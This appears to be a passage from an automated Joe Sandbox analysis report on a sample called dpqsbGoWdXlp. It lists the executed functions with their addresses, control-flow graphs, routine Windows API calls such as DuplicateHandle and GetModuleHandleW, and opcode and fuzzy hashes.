                                                                                                                                execution_graph 24166 10b4668 24167 10b467a 24166->24167 24168 10b4686 24167->24168 24170 10b4778 24167->24170 24171 10b479d 24170->24171 24175 10b4878 24171->24175 24179 10b4888 24171->24179 24177 10b48af 24175->24177 24176 10b498c 24176->24176 24177->24176 24183 10b44b0 24177->24183 24180 10b48af 24179->24180 24181 10b44b0 CreateActCtxA 24180->24181 24182 10b498c 24180->24182 24181->24182 24184 10b5918 CreateActCtxA 24183->24184 24186 10b59db 24184->24186 24197 10bd751 24198 10bd714 DuplicateHandle 24197->24198 24200 10bd75a 24197->24200 24199 10bd726 24198->24199 24187 10bd040 24188 10bd086 GetCurrentProcess 24187->24188 24190 10bd0d8 GetCurrentThread 24188->24190 24191 10bd0d1 24188->24191 24192 10bd10e 24190->24192 24193 10bd115 GetCurrentProcess 24190->24193 24191->24190 24192->24193 24196 10bd14b 24193->24196 24194 10bd173 GetCurrentThreadId 24195 10bd1a4 24194->24195 24196->24194 24201 10bacb0 24202 10bacbf 24201->24202 24205 10bada8 24201->24205 24210 10bad97 24201->24210 24206 10badb9 24205->24206 24207 10baddc 24205->24207 24206->24207 24208 10bafe0 GetModuleHandleW 24206->24208 24207->24202 24209 10bb00d 24208->24209 24209->24202 24211 10baddc 24210->24211 24212 10badb9 24210->24212 24211->24202 24212->24211 24213 10bafe0 GetModuleHandleW 24212->24213 24214 10bb00d 24213->24214 24214->24202

                                                                                                                                Executed Functions

                                                                                                                                Function 010BD030 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 010BD0BE
                                                                                                                                • GetCurrentThread.KERNEL32 ref: 010BD0FB
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 010BD138
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 010BD191
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2340403513.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_10b0000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                • Opcode ID: efe661c9a7c38f2fe2027291d460350395e20ea49803e75d0df9c7c3d423ab6d
                                                                                                                                • Instruction ID: c27148e3fa9abc460e548e4fc718077428e3d84dfa5e9a97389cf03360809054
                                                                                                                                • Opcode Fuzzy Hash: efe661c9a7c38f2fe2027291d460350395e20ea49803e75d0df9c7c3d423ab6d
                                                                                                                                • Instruction Fuzzy Hash: 685176B09013499FEB44CFA9D588BDEBBF1FF88318F208459E108A7350DB745845CB61
                                                                                                                                Function 010BD040 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 010BD0BE
                                                                                                                                • GetCurrentThread.KERNEL32 ref: 010BD0FB
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 010BD138
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 010BD191
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2340403513.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_10b0000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                • Opcode ID: a989467eba63d7ee896d012be1dfcc3d381d40c627c405eb52dbbeaf5ec56ec9
                                                                                                                                • Instruction ID: 6918301006e3dae60f1136b9cf5a47e902714a6bf20ce820e36126322c179292
                                                                                                                                • Opcode Fuzzy Hash: a989467eba63d7ee896d012be1dfcc3d381d40c627c405eb52dbbeaf5ec56ec9
                                                                                                                                • Instruction Fuzzy Hash: 7E5177B09013499FEB54DFA9D948BEEBBF1FF88318F208459E109A7350DB746884CB65
                                                                                                                                Function 010BADA8 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 44 10bada8-10badb7 45 10badb9-10badc6 call 10ba0cc 44->45 46 10bade3-10bade7 44->46 51 10badc8 45->51 52 10baddc 45->52 48 10badfb-10bae3c 46->48 49 10bade9-10badf3 46->49 55 10bae49-10bae57 48->55 56 10bae3e-10bae46 48->56 49->48 99 10badce call 10bb030 51->99 100 10badce call 10bb040 51->100 52->46 57 10bae7b-10bae7d 55->57 58 10bae59-10bae5e 55->58 56->55 62 10bae80-10bae87 57->62 60 10bae69 58->60 61 10bae60-10bae67 call 10ba0d8 58->61 59 10badd4-10badd6 59->52 63 10baf18-10bafd8 59->63 64 10bae6b-10bae79 60->64 61->64 66 10bae89-10bae91 62->66 67 10bae94-10bae9b 62->67 94 10bafda-10bafdd 63->94 95 10bafe0-10bb00b GetModuleHandleW 63->95 64->62 66->67 70 10baea8-10baeaa call 10ba0e8 67->70 71 10bae9d-10baea5 67->71 74 10baeaf-10baeb1 70->74 71->70 75 10baebe-10baec3 74->75 76 10baeb3-10baebb 74->76 78 10baee1-10baeee 75->78 79 10baec5-10baecc 75->79 76->75 85 10baf11-10baf17 78->85 86 10baef0-10baf0e 78->86 79->78 80 10baece-10baede call 10ba0f8 call 10ba108 79->80 80->78 86->85 94->95 96 10bb00d-10bb013 95->96 97 10bb014-10bb028 95->97 96->97 99->59 100->59
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 010BAFFE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2340403513.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_10b0000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                • Opcode ID: 838b7fcdb9898be7d2edf2ee2d81bc02d621bf84bb88d7e16e0869bbb9dd99b5
                                                                                                                                • Instruction ID: 4987371b9923132ba75ac5b2d7bc29bfad69fae5f90a27ba4b3951adf158dd55
                                                                                                                                • Opcode Fuzzy Hash: 838b7fcdb9898be7d2edf2ee2d81bc02d621bf84bb88d7e16e0869bbb9dd99b5
                                                                                                                                • Instruction Fuzzy Hash: 28711170A00B05CFE764DF6AD48179ABBF1BF88304F008A6DE59AD7A40DB75E845CB91
                                                                                                                                Function 010B44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 101 10b44b0-10b59d9 CreateActCtxA 104 10b59db-10b59e1 101->104 105 10b59e2-10b5a3c 101->105 104->105 112 10b5a4b-10b5a4f 105->112 113 10b5a3e-10b5a41 105->113 114 10b5a51-10b5a5d 112->114 115 10b5a60 112->115 113->112 114->115 117 10b5a61 115->117 117->117
                                                                                                                                APIs
                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 010B59C9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2340403513.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_10b0000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Create
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                • Opcode ID: 1c1d091d0f5a07ff1f8ef3ef847d15e6f3ca81b51611ad8c2623584186d374fc
                                                                                                                                • Instruction ID: b31b11a8352e67580db1495eaa1b7feb9e71e1b830c7907aaec987acc0925617
                                                                                                                                • Opcode Fuzzy Hash: 1c1d091d0f5a07ff1f8ef3ef847d15e6f3ca81b51611ad8c2623584186d374fc
                                                                                                                                • Instruction Fuzzy Hash: F541DFB0C00719CBEB24CFAAC884BCEBBF5BF49304F60809AD509AB251DB756945CF90
                                                                                                                                Function 010B590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 118 10b590c-10b5913 119 10b591c-10b59d9 CreateActCtxA 118->119 121 10b59db-10b59e1 119->121 122 10b59e2-10b5a3c 119->122 121->122 129 10b5a4b-10b5a4f 122->129 130 10b5a3e-10b5a41 122->130 131 10b5a51-10b5a5d 129->131 132 10b5a60 129->132 130->129 131->132 134 10b5a61 132->134 134->134
                                                                                                                                APIs
                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 010B59C9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2340403513.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_10b0000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Create
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                • Opcode ID: 66f34dc13224b12b2908f282ae619a8600c7d5675e272c6a7d0e0a73a14dcb10
                                                                                                                                • Instruction ID: 15ebc0758fcc9dd1bab4ac75fc817259906323c500f0965e13cacb5599fad1ef
                                                                                                                                • Opcode Fuzzy Hash: 66f34dc13224b12b2908f282ae619a8600c7d5675e272c6a7d0e0a73a14dcb10
                                                                                                                                • Instruction Fuzzy Hash: D741EEB0C0071DCAEB24CFAAC984BDDBBF5BF89304F60809AD508AB251DB756946CF50
                                                                                                                                Function 010BD751 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 135 10bd751-10bd758 136 10bd75a-10bd87e 135->136 137 10bd714-10bd724 DuplicateHandle 135->137 138 10bd72d-10bd74a 137->138 139 10bd726-10bd72c 137->139 139->138
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010BD717
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2340403513.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_10b0000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: 49ddf47c8ab7f8db9b94a666e8fb2b25ea8c0263017629a92a87766e0ccf81da
                                                                                                                                • Instruction ID: cada0fec5e0e838a798461b91b5cdcddf4d7abc31361b7411dec26d3497b0a1d
                                                                                                                                • Opcode Fuzzy Hash: 49ddf47c8ab7f8db9b94a666e8fb2b25ea8c0263017629a92a87766e0ccf81da
                                                                                                                                • Instruction Fuzzy Hash: E531C0786403848FE318EF61F4957693BB2F784710F10812AE9A18F7C8CAFA1845CF10
                                                                                                                                Function 010BD688 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 153 10bd688-10bd724 DuplicateHandle 154 10bd72d-10bd74a 153->154 155 10bd726-10bd72c 153->155 155->154
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010BD717
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2340403513.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_10b0000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: 50b14cacf44f49a0cd1b44d5f64bcb812fd19b5f75b6e8d5bfef8d961026c4ce
                                                                                                                                • Instruction ID: 68780a3b0993f45122f7c56b18d3ca1f2f944ddd776417eb65ee4542a54272ba
                                                                                                                                • Opcode Fuzzy Hash: 50b14cacf44f49a0cd1b44d5f64bcb812fd19b5f75b6e8d5bfef8d961026c4ce
                                                                                                                                • Instruction Fuzzy Hash: 8521E3B59002499FDB10CF9AD984ADEFFF4FB48324F14841AE958A7210D374A954CFA1
                                                                                                                                Function 010BD690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 158 10bd690-10bd724 DuplicateHandle 159 10bd72d-10bd74a 158->159 160 10bd726-10bd72c 158->160 160->159
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010BD717
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2340403513.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_10b0000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: 5b90feea75e0eecd26ad719e71c12a726a4721036da85a87d0132a5637c80178
                                                                                                                                • Instruction ID: 18b9da5250322dd60e1bdc7072292f23dccc88513b6ab1985df13a2a6995e285
                                                                                                                                • Opcode Fuzzy Hash: 5b90feea75e0eecd26ad719e71c12a726a4721036da85a87d0132a5637c80178
                                                                                                                                • Instruction Fuzzy Hash: F121E3B59002499FDB10CF9AD984ADEFBF4FB48324F14841AE918A3210D374A954CFA0
                                                                                                                                Function 010BAF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 163 10baf98-10bafd8 164 10bafda-10bafdd 163->164 165 10bafe0-10bb00b GetModuleHandleW 163->165 164->165 166 10bb00d-10bb013 165->166 167 10bb014-10bb028 165->167 166->167
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 010BAFFE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2340403513.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_10b0000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                • Opcode ID: 09bfe1a95f7e6c9436b73de5b1d9856f375443ce9746b3aa793499952f9085fe
                                                                                                                                • Instruction ID: b568316886fc862e6029fe77659df5a8df5e71561ab2b9c2c29645389d5ed499
                                                                                                                                • Opcode Fuzzy Hash: 09bfe1a95f7e6c9436b73de5b1d9856f375443ce9746b3aa793499952f9085fe
                                                                                                                                • Instruction Fuzzy Hash: 5911DFB6C006498FDB24CF9AC844BDEFBF4AB88224F10845AE569A7610D379A545CFA1
                                                                                                                                Function 06C1B578 Relevance: 1.3, Strings: 1, Instructions: 14COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 169 6c1b578-6c1b582 170 6c1b584-6c1b587 169->170 171 6c1b58a-6c1b592 call 6c153f4 169->171 173 6c1b597-6c1b598 171->173
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: <N`
                                                                                                                                • API String ID: 0-4051224117
                                                                                                                                • Opcode ID: 4f9f044427da152140519e9150d080d624556563afc04828e25157ad981cf480
                                                                                                                                • Instruction ID: 4d3e18c9ba7a1423c55b00d78cfac24f12969e13f1871b8aecb1660bb7770e2b
                                                                                                                                • Opcode Fuzzy Hash: 4f9f044427da152140519e9150d080d624556563afc04828e25157ad981cf480
                                                                                                                                • Instruction Fuzzy Hash: 95D0123211010C5F4BC0EF96E800C527BDDBB597407408466E544CF520E622E534FB51
                                                                                                                                Function 06C10DE0 Relevance: .5, Instructions: 523COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 468 6c10de0-6c10f26 481 6c10f28 468->481 482 6c10f2a-6c10f33 468->482 481->482 483 6c10f35 482->483 484 6c10f37-6c10f40 482->484 483->484 485 6c10f42 484->485 486 6c10f48-6c10f4c 484->486 485->486 487 6c11094-6c1109d 485->487 488 6c10f53 486->488 489 6c10f4e-6c10f51 486->489 491 6c110a5-6c110d3 487->491 492 6c1109f 487->492 490 6c10f56-6c10f8d 488->490 489->490 493 6c10f94-6c10f98 490->493 494 6c10f8f-6c10f92 490->494 496 6c110d5-6c110d8 491->496 497 6c110da-6c110de 491->497 492->491 495 6c111c3-6c111e0 492->495 498 6c10f9b-6c10f9f 493->498 494->493 494->498 502 6c111e7-6c11245 495->502 496->497 499 6c110e1-6c110e5 496->499 497->499 500 6c10fa1-6c10fa4 498->500 501 6c10fa6 498->501 503 6c110e7-6c110ea 499->503 504 6c110ec 499->504 505 6c10fa9-6c10fe0 500->505 501->505 514 6c11253 502->514 515 6c11247-6c11251 502->515 506 6c110ef-6c11126 503->506 504->506 507 6c10fe2-6c10fe5 505->507 508 6c10fe7-6c10feb 505->508 510 6c11128-6c1112b 506->510 511 6c1112d-6c11131 506->511 507->508 513 6c10fee-6c10ff2 507->513 508->513 510->511 512 6c11134-6c11162 510->512 511->512 516 6c11164-6c11167 512->516 517 6c11169-6c1116d 512->517 519 6c10ff4-6c10ff7 513->519 520 6c10ff9 513->520 518 6c11255-6c11257 514->518 515->518 516->517 521 6c11170-6c11174 516->521 517->521 523 6c1125d-6c11347 518->523 524 6c1134f-6c11353 518->524 522 6c10ffc-6c11033 519->522 520->522 525 6c11176-6c11179 521->525 526 6c1117b 521->526 529 6c11035-6c11038 522->529 530 6c1103a-6c1103e 522->530 523->524 527 6c11361 524->527 528 6c11355-6c1135f 524->528 533 6c1117e-6c111b5 525->533 526->533 534 6c11363-6c11365 527->534 528->534 529->530 531 6c11041-6c11045 529->531 530->531 535 6c11047-6c1104a 531->535 536 6c1104c 531->536 537 6c111b7-6c111ba 533->537 538 6c111bc-6c111c0 533->538 539 6c1136b-6c11455 534->539 540 6c1145d-6c114e3 534->540 541 6c1104f-6c11086 535->541 536->541 537->495 537->538 538->495 539->540 555 6c11525-6c1157b 540->555 556 6c114e5-6c114f1 540->556 543 6c11088-6c1108b 541->543 544 6c1108d-6c11091 541->544 543->487 543->544 544->487 556->555 559 6c114f3-6c1150c 556->559 559->555 564 6c1150e-6c1151d 559->564 564->555
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6eded1e5e69335f343959c5837d8fdcad4e3bde3cae556636b492b77132e3d88
                                                                                                                                • Instruction ID: 837177321c815a8dc7218c6642d785d49defbb00798f2d8e0c459e28a9960c01
                                                                                                                                • Opcode Fuzzy Hash: 6eded1e5e69335f343959c5837d8fdcad4e3bde3cae556636b492b77132e3d88
                                                                                                                                • Instruction Fuzzy Hash: 0A42F230E1065DCFCB55EFA8C8446DCBBB1BF4A300F518299D5497B265EB30AA99CF81
                                                                                                                                Function 06C10DD2 Relevance: .5, Instructions: 520COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 565 6c10dd2-6c10f26 578 6c10f28 565->578 579 6c10f2a-6c10f33 565->579 578->579 580 6c10f35 579->580 581 6c10f37-6c10f40 579->581 580->581 582 6c10f42 581->582 583 6c10f48-6c10f4c 581->583 582->583 584 6c11094-6c1109d 582->584 585 6c10f53 583->585 586 6c10f4e-6c10f51 583->586 588 6c110a5-6c110d3 584->588 589 6c1109f 584->589 587 6c10f56-6c10f8d 585->587 586->587 590 6c10f94-6c10f98 587->590 591 6c10f8f-6c10f92 587->591 593 6c110d5-6c110d8 588->593 594 6c110da-6c110de 588->594 589->588 592 6c111c3-6c111e0 589->592 595 6c10f9b-6c10f9f 590->595 591->590 591->595 599 6c111e7-6c11245 592->599 593->594 596 6c110e1-6c110e5 593->596 594->596 597 6c10fa1-6c10fa4 595->597 598 6c10fa6 595->598 600 6c110e7-6c110ea 596->600 601 6c110ec 596->601 602 6c10fa9-6c10fe0 597->602 598->602 611 6c11253 599->611 612 6c11247-6c11251 599->612 603 6c110ef-6c11126 600->603 601->603 604 6c10fe2-6c10fe5 602->604 605 6c10fe7-6c10feb 602->605 607 6c11128-6c1112b 603->607 608 6c1112d-6c11131 603->608 604->605 610 6c10fee-6c10ff2 604->610 605->610 607->608 609 6c11134-6c11162 607->609 608->609 613 6c11164-6c11167 609->613 614 6c11169-6c1116d 609->614 616 6c10ff4-6c10ff7 610->616 617 6c10ff9 610->617 615 6c11255-6c11257 611->615 612->615 613->614 618 6c11170-6c11174 613->618 614->618 620 6c1125d-6c11347 615->620 621 6c1134f-6c11353 615->621 619 6c10ffc-6c11033 616->619 617->619 622 6c11176-6c11179 618->622 623 6c1117b 618->623 626 6c11035-6c11038 619->626 627 6c1103a-6c1103e 619->627 620->621 624 6c11361 621->624 625 6c11355-6c1135f 621->625 630 6c1117e-6c111b5 622->630 623->630 631 6c11363-6c11365 624->631 625->631 626->627 628 6c11041-6c11045 626->628 627->628 632 6c11047-6c1104a 628->632 633 6c1104c 628->633 634 6c111b7-6c111ba 630->634 635 6c111bc-6c111c0 630->635 636 6c1136b-6c11455 631->636 637 6c1145d-6c114e3 631->637 638 6c1104f-6c11086 632->638 633->638 634->592 634->635 635->592 636->637 652 6c11525-6c1157b 637->652 653 6c114e5-6c114f1 637->653 640 6c11088-6c1108b 638->640 641 6c1108d-6c11091 638->641 640->584 640->641 641->584 653->652 656 6c114f3-6c1150c 653->656 656->652 661 6c1150e-6c1151d 656->661 661->652
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 74a61a1db6b22f141ff2fbffbfa3afc873c49f095c929498d46472d3ffb27b1d
                                                                                                                                • Instruction ID: 42d400c414086da05762cb963b90af1ca71f9ae5fefd5435ee6d5c9497f31cd3
                                                                                                                                • Opcode Fuzzy Hash: 74a61a1db6b22f141ff2fbffbfa3afc873c49f095c929498d46472d3ffb27b1d
                                                                                                                                • Instruction Fuzzy Hash: C2420230D10659CFCB65EFA8C8446DCBBB1BF4A300F518299D5497B265EB309AE9CF81
                                                                                                                                Function 06C1AAFB Relevance: .3, Instructions: 259COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ee90848e4ab18a5fb2c01f7082ac083118a0144fed7bcce6bf3e0e1f87b87858
                                                                                                                                • Instruction ID: 5620e8932c14c614692d5b050418bc8ecdf0d3844f0f61e99cddf8e92d06c57f
                                                                                                                                • Opcode Fuzzy Hash: ee90848e4ab18a5fb2c01f7082ac083118a0144fed7bcce6bf3e0e1f87b87858
                                                                                                                                • Instruction Fuzzy Hash: 1AA119B0E0521ACFDB44EFE9C4406EDBBB6FF8A300F109619D919AB355DA70A941DF90
                                                                                                                                Function 06C10838 Relevance: .2, Instructions: 207COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 262bb44641ea2b172e24825230024de5bf6d73876d070480cf5c0fb079c09e0a
                                                                                                                                • Instruction ID: c963541934ccceb93b96644ffb3eb35e5199be6a95cabc3e63707e932af9a733
                                                                                                                                • Opcode Fuzzy Hash: 262bb44641ea2b172e24825230024de5bf6d73876d070480cf5c0fb079c09e0a
                                                                                                                                • Instruction Fuzzy Hash: F7819130F10209DFDB41EF69D5986EDBBB0FF46310F10856AE045AB264EF309995DB80
                                                                                                                                Function 06C149A8 Relevance: .2, Instructions: 162COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ba6ecc6305e1254597c24e9908f18894954e4e4e03a5047ddb3c617f45b77129
                                                                                                                                • Instruction ID: 80bfd67033fc546168b38e79f183cb8cb2161dcc96ec3035c868e72dbf0cebf3
                                                                                                                                • Opcode Fuzzy Hash: ba6ecc6305e1254597c24e9908f18894954e4e4e03a5047ddb3c617f45b77129
                                                                                                                                • Instruction Fuzzy Hash: 6951BD35B042549BC704AF74D854AAEBBB3BF8A300F50C5A9E991AF385CF706D098BC1
                                                                                                                                Function 06C149B8 Relevance: .2, Instructions: 152COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4a43ab8c4377e80ed65ba03049c72d6f85d7c1f3d0574c8358fd2b5ac63357b5
                                                                                                                                • Instruction ID: 6e2470164b0057727aa907b3c0d99b60dd0ea9e0ed89e4bb0e5ada310b8c9ff4
                                                                                                                                • Opcode Fuzzy Hash: 4a43ab8c4377e80ed65ba03049c72d6f85d7c1f3d0574c8358fd2b5ac63357b5
                                                                                                                                • Instruction Fuzzy Hash: 6751AE35B042549BD704AF74D854AAEBBB3BF89300F50C4A8D9916F385CF70AD498BC1
                                                                                                                                Function 06C15410 Relevance: .1, Instructions: 144COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fbaf21c5fda1b76d60a2855170fbef7e9831b5460bb90cc301bb831e763ed563
